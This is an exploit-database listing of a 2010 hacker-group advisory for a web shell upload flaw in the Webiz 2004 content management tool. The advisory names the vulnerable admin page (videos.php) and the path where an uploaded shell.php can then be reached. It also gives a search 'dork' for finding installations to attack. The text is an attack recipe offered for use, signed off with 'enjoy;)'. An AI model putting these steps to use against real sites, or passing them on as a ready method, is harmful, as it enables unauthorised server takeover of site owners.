Webiz 2004 – Local File Upload

  • 作者: kannibal615
    日期: 2010-05-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12797/
  • # Exploit Title: (Webiz) local SHELL Upload Vulnerability
# Date: 23-05-2010
# Author: kannibal615
# Software Link: N/A
# Version: 2004
# Tested on: PHP
# CVE : N/A
# Code : 


 @@@@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@
 @@@@@@ @@@@@@ @@@@ @@ @@ @@@@ @@ @@
 @@@@@@ @@@ @@@@@@@@@@@@@@ @@@@ @@@@@@ @@ @@
@@@@ @@ @@@ @@@@@@@@@@@@@@@@@@ @@ @@@@@@@@ @@ @@
 @@@@@@ @@@@@@@@@@@@ @@@@ @@ @@ @@
@@ @@@@@@ @@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@ dot NET

 KANNIBAL615
			
=========================================================================
 WEBIZ REMOTE SHELL UPLOAD VULNERABILITY
=========================================================================
BY
 KANNIBAL615
=========================================================================

== Found By : kannibal615
== website: www.vbhacker.net/vb
== email: zn[at]live[dot]de
==
== Thanks to: THE PIRATOR
==: Pc-InSeCt / emptyzero
==: DAK / l3G3NDS / m0j4h3d
==: V!Ru$_T4ckJ3n / __MiM0__ 
==: ruqa / PrideArabs / DIESEL
==: yassine_hell / mu$lim
==: ALL VBHACKER MEMBERS
=========================================================================

 EXPLOIT

=========================================================================
==CMS :Web content Management Tool [ wmt ]
==version :2004
==risk:hight
==dork:Powered by Webiz
==Rating:*****
==
==-------------------------------------------
==*** YOU MUST HAVE A ADMINISTRATOR RIGHT ***
==-------------------------------------------
==
==BUG
==../wmt/siteadmin/videos.php
==
==
==
==PHP file Upload
==
==
==
==upload your shell from here
==http://[localhost]/wmt/siteadmin/videos.php >> shell.php
==
==
==
==Get it
==http://[localhost]/wmt/userfiles/Media/videos/shell.php
==
==
==
==enjoy;)
==
==kannibal615 Copyright 2010
==
==www.vbhacker.net/vb
==========================================================================